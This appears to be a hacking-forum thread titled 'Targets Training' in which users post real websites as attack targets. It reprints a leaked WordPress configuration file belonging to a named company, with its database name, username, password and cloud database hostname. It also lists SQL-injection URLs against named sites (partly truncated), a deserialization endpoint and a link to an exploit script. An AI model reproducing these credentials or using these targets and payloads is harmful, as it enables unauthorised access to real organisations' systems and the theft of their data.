Targets Training
Vulnerability: Configuration file source code disclosure
Direct access to database information / Cause: the webmaster's lack of care and of proper configuration
Code:
<?php
// Add this to the top of your wp-config.php file.
// Handle reverse proxy, passing the IP to the server.
// This is used by some plugins to fetch the user's IP.
//if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
//    $ips = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
//    $_SERVER['REMOTE_ADDR'] = $ips[0];
//}

/**
 * The base configurations of the WordPress.
 *
 * This file has the following configurations: MySQL settings, Table Prefix,
 * Secret Keys, WordPress Language, and ABSPATH. You can find more information
 * by visiting {@link http://codex.wordpress.org/Editing_wp-config.php Editing
 * wp-config.php} Codex page. You can get the MySQL settings from your web host.
 *
 * This file is used by the wp-config.php creation script during the
 * installation. You don't have to use the web site, you can just copy this file
 * to "wp-config.php" and fill in the values.
 *
 * @package WordPress
 */
if ($_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https')
    $_SERVER['HTTPS']='on';

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'blog_pre-release');

/** MySQL database username */
define('DB_USER', 'fotor-wordpress');

/** MySQL database password */
define('DB_PASSWORD', 'h6Q2kCFJdwsxX$Ew');

/** MySQL hostname */
define('DB_HOST', 'fotor.czizywqdyvci.us-west-2.rds.amazonaws.com');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

/**#@+
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define('AUTH_KEY',         'put your unique phrase here');
define('SECURE_AUTH_KEY',  'put your unique phrase here');
define('LOGGED_IN_KEY',    'put your unique phrase here');
define('NONCE_KEY',        'put your unique phrase here');
define('AUTH_SALT',        'put your unique phrase here');
define('SECURE_AUTH_SALT', 'put your unique phrase here');
define('LOGGED_IN_SALT',   'put your unique phrase here');
define('NONCE_SALT',       'put your unique phrase here');
/**#@-*/

/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each a unique
 * prefix. Only numbers, letters, and underscores please!
 */
$table_prefix = 'b_';

/**
 * WordPress Localized Language, defaults to English.
 *
 * Change this to localize WordPress. A corresponding MO file for the chosen
 * language must be installed to wp-content/languages. For example, install
 * de_DE.mo to wp-content/languages and set WPLANG to 'de_DE' to enable German
 * language support.
 */
define('WPLANG', '');

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 */
define('WP_DEBUG', false);

/* That's all, stop editing! Happy blogging. */

/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
    define('ABSPATH', dirname(__FILE__) . '/');

/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');

/**define('WP_HOME','http://www.fotor.com/blog');*/
/**define('WP_SITEURL','http://www.fotor.com/blog');*/

// in some setups HTTP_X_FORWARDED_PROTO might contain
// a comma-separated list e.g. http,https
// so check for https existence
- Likes 1
-
Exploit: https://github.com/MrFalconn/Slider-...ain/exploit.py
======================================================================
File Download
===================
Targets:
ANOHA Consulting Discover ANOHA, the Tunisian reference for consulting and technical assistance for sustainable economic and social development. Thanks to our proven expertise and our innovative solutions, we guarantee quality services focused on tangible and measurable results. We emphasize ownership by the beneficiaries, offering solutions
I saw it was fun, so I thought I'd post it.
- Likes 1
-
CORS Origin
==================================================
-
SQL injection
===============================================
- Likes 1
-
insecure deserialization
---------------------------------------
https://election.ptaa.org.ph/Telerik...e.axd?type=rau
----------------------------
SQL injection
----------------------------
https://estetica-avanzada.com/catego...rom+crud_users
--------------------------------------------------------------------------------
http://jessicalimoni.com/property-fo...m+crud_users--
Happy Eid to you.
Last edited by Mr.Falcon (https://www.iranhack.com/forum/member/6671-mr-falcon) at 03-21-2022, 04:19 PM
- Likes 1